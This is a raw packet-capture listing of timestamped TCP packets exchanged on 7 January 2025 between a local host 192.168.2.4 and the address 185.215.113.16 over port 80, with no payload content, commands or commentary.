Jan 7, 2025 10:08:20.018657923 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.018690109 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.018702030 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.019444942 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.019465923 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.019479990 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.019531965 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.019532919 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.019545078 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.019578934 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.020436049 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.020447969 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.020459890 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.020477057 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.020488977 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.020576954 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.021306038 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.021318913 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.021330118 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.021342039 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.021358013 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.021364927 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.021380901 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.022108078 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.022120953 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.022131920 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.022151947 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.022169113 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.022182941 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.022208929 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.023046017 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.023060083 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.023071051 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.023082018 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.023094893 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.023121119 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.023139954 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.023859978 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.023873091 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.023917913 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.024163961 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.024194002 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.024207115 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.024215937 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.024250031 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.024264097 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.024904013 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.024914026 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.024926901 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.024972916 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.026020050 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.026295900 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.026310921 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.026324987 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.026339054 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.026351929 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.026370049 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.027012110 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.027024031 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.027035952 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.027060986 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.027133942 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.027220011 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.027236938 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.027247906 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.027260065 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.027271032 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.027290106 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.027291059 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.027303934 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.027323008 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.027331114 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.027587891 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.027600050 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.027612925 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.027623892 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.027640104 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.027663946 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.027698994 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.027712107 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.027723074 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.027735949 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.027760029 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.027786016 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.028395891 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.028433084 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.028851032 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.058434963 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.106511116 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.106532097 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.106545925 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.106599092 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.106651068 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.106699944 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.106836081 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.106849909 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.107012033 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.107023954 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.107036114 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.107045889 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.107049942 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.107059002 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.107070923 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.107085943 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.107093096 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.107109070 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.107167959 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.107178926 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.107191086 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.107197046 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.107230902 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.107321024 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.107502937 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.107512951 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.107525110 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.107534885 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.107542038 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.107553959 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.107580900 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.107666969 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.107677937 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.107688904 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.107701063 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.107712030 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.107716084 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.107726097 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.107738018 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.107743979 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.107763052 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.107784033 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.107811928 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.107831001 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.107842922 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.107855082 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.107867002 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.107878923 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.107892036 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.107892990 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.107904911 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.107918978 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.107920885 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.107938051 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.107952118 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.107955933 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.107971907 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.107983112 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.107984066 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.107996941 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.108011007 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.108011961 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.108022928 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.108033895 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.108036041 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.108046055 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.108057022 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.108069897 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.108073950 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.108087063 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.108098984 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.108098984 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.108109951 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.108110905 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.108124971 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.108140945 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.108146906 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.108160019 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.108169079 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.108172894 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.108186007 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.108196974 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.108206034 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.108210087 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.108222008 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.108233929 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.108237028 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.108256102 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.108273983 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.108288050 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.108299971 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.108311892 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.108324051 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.108351946 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.108388901 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.108390093 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.108401060 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.108413935 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.108424902 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.108436108 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.108438015 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.108457088 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.108464956 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.108470917 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.108481884 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.108495951 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.108520985 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.141326904 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.141345978 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.141354084 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.141381979 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.141405106 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.141427040 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.141454935 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.141464949 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.141485929 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.141489029 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.141500950 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.141515017 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.141529083 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.141530037 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.141551971 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.141561031 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.141599894 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.141611099 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.141628027 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.141653061 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.141673088 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.141699076 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.141710043 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.141721010 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.141746998 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.141762972 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.141774893 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.141839027 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.141849995 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.141860962 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.141894102 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.141906023 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.141915083 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.141918898 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.141943932 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.142111063 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.142121077 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.142131090 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.142172098 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.142177105 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.142189980 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.142210960 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.142227888 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.142256975 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.142301083 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.142306089 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.142316103 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.142326117 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.142354012 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.142366886 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.142393112 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.142404079 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.142435074 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.142520905 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.142530918 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.142540932 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.142551899 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.142561913 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.142591000 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.142733097 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.142774105 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.142776012 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.142785072 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.142822981 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.142889977 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.142899990 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.142910004 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.142926931 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.142934084 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.142968893 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.194124937 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.194139957 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.194165945 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.194176912 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.194188118 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.194200039 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.194200039 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.194211006 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.194222927 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.194257021 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.194263935 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.194269896 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.194281101 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.194299936 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.194329977 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.194340944 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.194353104 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.194363117 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.194377899 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.194391012 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.194447994 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.194459915 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.194470882 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.194510937 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.194591999 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.194606066 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.194617987 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.194632053 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.194659948 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.194664001 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.194675922 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.194686890 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.194699049 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.194725037 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.194749117 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.194806099 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.194818020 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.194829941 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.194843054 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.194854975 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.194884062 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.194952965 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.194964886 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.195008993 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.268068075 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.268083096 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.268095016 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.268105984 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.268183947 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.268213034 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.268224955 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.268243074 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.268260956 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.268271923 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.268273115 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.268286943 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.268299103 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.268330097 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.268367052 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.268378019 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.268388033 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.268398046 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.268409967 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.268429995 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.268455029 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.268722057 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.268734932 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.268743992 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.268757105 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.268767118 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.268775940 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.268804073 CET	49884	80	192.168.2.4	185.215.113.16
Jan 7, 2025 10:08:20.268837929 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.268847942 CET	80	49884	185.215.113.16	192.168.2.4
Jan 7, 2025 10:08:20.268857956 CET	80	49884	185.215.113.16	192.168.2.4
